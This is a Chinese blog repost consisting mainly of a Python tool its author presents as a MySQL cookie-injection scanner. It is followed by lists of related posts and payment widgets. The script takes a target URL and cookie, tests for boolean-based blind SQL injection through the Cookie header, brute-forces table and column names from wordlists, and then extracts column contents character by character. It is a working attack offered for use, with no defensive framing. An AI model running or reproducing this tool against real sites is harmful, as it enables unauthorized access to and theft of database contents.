cookie注入脚本

最新推荐文章于 2023-10-10 12:41:22 发布
最新推荐文章于 2023-10-10 12:41:22 发布
阅读量266 收藏
点赞数
原文链接:http://www.cnblogs.com/grey-network/p/9021547.html
版权 
  1 import urllib.request
  2 import urllib.parse
  3 import urllib.error
  4 import http.cookiejar
  5 import argparse
  6 
  7 # url='http://172.20.10.8/bug/cookie.php'
  8 url = argparse.ArgumentParser()
  9 url.add_argument('-u',help="-u http://localhost/cookie.php",type=str)
 10 url.add_argument('-cookie',help="-cookie id=xxx",type=str)
 11 args = url.parse_args()
 12 url = args.u
 13 cookie = args.cookie
 14 grey = '''
 15 *****************************************************
 16 
 17             SQL mysql_cookie 注入工具
 18             作者:Grey_Network
 19 
 20 *****************************************************
 21 '''
 22 
 23 print(grey)
 24 
 25 a = "%20and%201=1"
 26 b = "%20and%201=2"
 27 header={
 28     'User-Agent':'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
 29     'Referer':url,
 30     'Cookie':cookie
 31 }
 32 headera={
 33     'User-Agent':'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
 34     'Referer':url,
 35     'Cookie':cookie+a
 36 }
 37 headerb={
 38     'User-Agent':'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
 39     'Referer':url,
 40     'Cookie':cookie+b
 41 }
 42 sqlurl = urllib.request.Request(url,headers=header)
 43 sqlurl1 = urllib.request.urlopen(sqlurl).read()
 44 sqla = urllib.request.Request(url,headers=headera)
 45 sqla1 = urllib.request.urlopen(sqla).read()
 46 sqlb = urllib.request.Request(url,headers=headerb)
 47 sqlb1 = urllib.request.urlopen(sqlb).read()
 48 
 49 
 50 if sqlurl1 == sqla1 and sqlurl !=sqlb1:
 51     table= input("Whether or not the scan table ? Y/n > ")
 52     dirt = "table.txt"
 53     webdirt=[]
 54     with open(dirt) as infile:
 55         while True:
 56             dirdict = infile.readline().strip()
 57             if (len(dirdict) == 0): break
 58             webdirt.append(dirdict)
 59     if table == "y":
 60         for line in webdirt:
 61             headert = {
 62                 'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
 63                 'Referer': url,
 64                 'Cookie': cookie + "%20and%20exists%20(select%20*%20from%20" + line + ")"
 65             }
 66             table_scan = urllib.request.Request(url,headers=headert)
 67             table_scan1 = urllib.request.urlopen(table_scan).read()
 68             if table_scan1 == sqla1 and table_scan1 !=sqlb1:
 69                 print("table:\n",line)
 70                 column = input("Whether to scan the field ? Y/n > ")
 71                 table_file = input("table > ")
 72                 dirc = "column.txt"
 73                 webdirc = []
 74                 with open(dirc) as infilec:
 75                     while True:
 76                         dirdicc = infilec.readline().strip()
 77                         if (len(dirdicc) == 0): break
 78                         webdirc.append(dirdicc)
 79                 if column == "y":
 80                     for linec in webdirc:
 81                         headerc = {
 82                             'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
 83                             'Referer': url,
 84                             'Cookie': cookie + "%20and%20exists%20(select%20"+linec+"%20from%20" + table_file + ")"
 85                         }
 86                         column_scan = urllib.request.Request(url, headers=headerc)
 87                         column_scan1 = urllib.request.urlopen(column_scan).read()
 88                         if column_scan1 == sqla1 and column_scan1 != sqlb1:
 89                             print("column:\n", linec)
 90                     c1 = input("Do you start guessing ? Y/n > ")
 91                     column_file = input("column > ")
 92                     if c1 == "y":
 93                         o = 0
 94                         while(o<100):
 95                             o = o+1
 96                             oc = str(o)
 97                             headerc1 = {
 98                                 'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
 99                                 'Referer': url,
100                                 'Cookie': cookie + "%20and%20length("+column_file+")="+oc
101                             }
102                             c1_scan = urllib.request.Request(url,headers=headerc1)
103                             c1_scan1 = urllib.request.urlopen(c1_scan).read()
104                             if c1_scan1 == sqla1 and c1_scan1 != sqlb1:
105 
106                                 ca1=0
107                                 while(ca1<int(oc)):
108                                     ca1=ca1+1
109                                     cac1=str(ca1)
110                                     ca2=0
111                                     while(ca2<128):
112                                         ca2=ca2+1
113                                         cac2 = str(ca2)
114                                         headerca1 = {
115                                             'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
116                                             'Referer': url,
117                                             'Cookie': cookie + "%20and%20ord(mid("+column_file+","+cac1+",1))="+cac2
118                                         }
119                                         ca1_scan = urllib.request.Request(url,headers=headerca1)
120                                         ca1_scan1 = urllib.request.urlopen(ca1_scan).read()
121                                         if ca1_scan1 == sqla1 and ca1_scan1 != sqlb1:
122                                             data_dump = chr(int(cac2))
123                                             print(data_dump)
124 else:
125     print("很遗憾,无法注入")

 

转载于:https://www.cnblogs.com/grey-network/p/9021547.html

weixin_30760895
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cookie注入自动化检测脚本实现
afei001
07-17 455
在渗透中基于Cookie注入可能会有不少小伙伴忽视。最近又在玩山*的靶场,于是自动化实现了一下检测。
cookie过滤注入脚本攻击与cookie设置加密的类的编写2017年8月17日
a2564753772的博客
08-17 207
cookie(储存在用户本地终端上的数据) 我经常用于比如 1,验证码的校验 2,用户信息校验。 3,限制登陆次数校验。 cookie脚本注入攻击 通过修改cookie里的值注入恶意代码,破解网站 如下面的案例: 新建一个web网页 1,书写一...
Javascript操作Cookie脚本CookieHelper
weixin_34228662的博客
11-13 84
var HttpCookie = function(name, value, expires, path, domain) { if (name) this.Name = name; if (value) this.Value = value; if (expires) this.Expires = expires; if (path) this.Path = path; if (domain) ...
access学习_Access注入Cookie注入(学习笔记)
weixin_39742727的博客
11-21 134
理论Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪.Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同Cookie注入典型步骤1.寻找形如“.asp?id=xx”类的带参数的URL。2.去掉“id=xx”查看页面显示是否正常...
COOKIES注入php-5教程及脚本
04-12
COOKIES注入php-5教程及脚本,配合程序PHP-5-WIN32使用,完成cookie注入攻击。 仅仅供学习使用,不可用于恶意攻击!恶意行为由下载者个人承担!
py-cookieJsInjection:一个从网络嗅探 cookie 并输出可用于将 cookie 注入任何浏览器的 Javascript 代码的 python 脚本
06-03
一个简单的sidejacking工具,使用javascript cookie注入。 该软件会嗅探任何 cookie 接口,并生成可注入任何浏览器的 javascript 代码,方法是将其粘贴到 URL 栏中。 它附带一个脚本: OSx10.6_monitorMode.py ,它...
利用Cookie攻击
12-03
cookie欺骗,cookie注入 Cookie文件名称格式 设置cookie脚本
Web攻防系列教程之Cookie注入攻防实战.pdf
09-27
Web攻防系列教程之Cookie注入攻防实战 Cookie 注入是一种基于 HTTP 协议的攻击方式,通过在 Cookie注入恶意代码来攻击网站。下面是 Cookie 注入的详细知识点: 一、Cookie 背景介绍 Cookie 是一种小型文本...
Javascript注入技巧
12-12
作者: kostis90gr 翻译: 黯魂[S.S.T] 本文已发表于《黑客防线》6月刊,版权属于《黑客防线》及脚本安全小组,转载请保持文章完整性,谢谢 :) 这份指南仅仅是出于报告目的,如果任何人把它用于违法目的,我不负...
SQL注入——cookie注入
weixin_74991270的博客
10-10 475
工具很方面,但是IP老是被ban手工虽说很麻烦,但是还是有惊喜的多挖挖src增加实战经验。
js 操作 cookie脚本
青蛙king的博客
06-16 452
var CookieUtil = { get: function(name){ var cookieName = encodeURIComponent(name) + "=", cookieStart = document.cookie.indexOf(cookieName), cookieValue = null; if(cookieStart > -1){ var cookieEnd .
JS脚本操作COOKIE
王涛的BLOG
09-11 1340
// -------------------------// JavaScript的Cookies函数库// -------------------------// 保存Cookiefunction saveCookie(name, value, expires, path, domain, secure){  var strCookie = name + "=" + value;  if (ex
客户端访问cookie脚本
weixin_30786657的博客
03-03 239
脚本是从别的网站贴的,尊重别人成果,完整保留所有问题 代码我已经验证过,没有问题。 说明一点document.cookie是一个非常特殊的属性,只需要设置 document.cookie = "cookieName= cookieValue"即可。他实际上是把新cookie加到cookie列表中。var allcookie = document.cookie ;返回的是所有cookie的信息。...
COOKIE脚本记录JS脚本
dreamsky55_的专栏
08-22 540
 function get_cookie(Name) {var search = Name + "="var returnvalue = "";if (documents.cookie.length > 0) {offset = documents.cookie.indexOf(search)if (offset != -1) { // if cookie exists
报错型Cookie注入自动化检测脚本检测实现
afei001
07-17 238
脚本是在Cookie注入自动化检测脚本实现的基础上进行检测的。Cookie注入自动化检测脚本请点击。
05,JavaScript脚本cookie
bingliang514csdn的博客
11-13 203
05,JavaScript脚本cookie
cookie注入原理
qq_39416206的博客
03-30 3342
cookie注入原理
cookie注入
weixin_58358185的博客
11-19 802
cookie注入
渗透测试——cookie注入
zjdda的博客
05-24 3711
1.cookie注入原理 Cookie最先是由Netscape(网景)公司提出的,Netscape官方文档中对Cookie的定义是这样的: Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式Cookie的用途非常广泛,在网络中经常可以见到Cookie的身影。它通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站和电子商务网站中的“购物车”。 Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie
cookie注入工具
最新发布
01-31
同时,攻击者还可以利用Cookie注入工具来进行跨站脚本攻击(XSS)或者会话劫持等攻击。 为了防止Cookie注入攻击,网站开发者需要加强对用户输入的过滤和验证,设置合理的安全策略,限制Cookie的范围和有效期,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值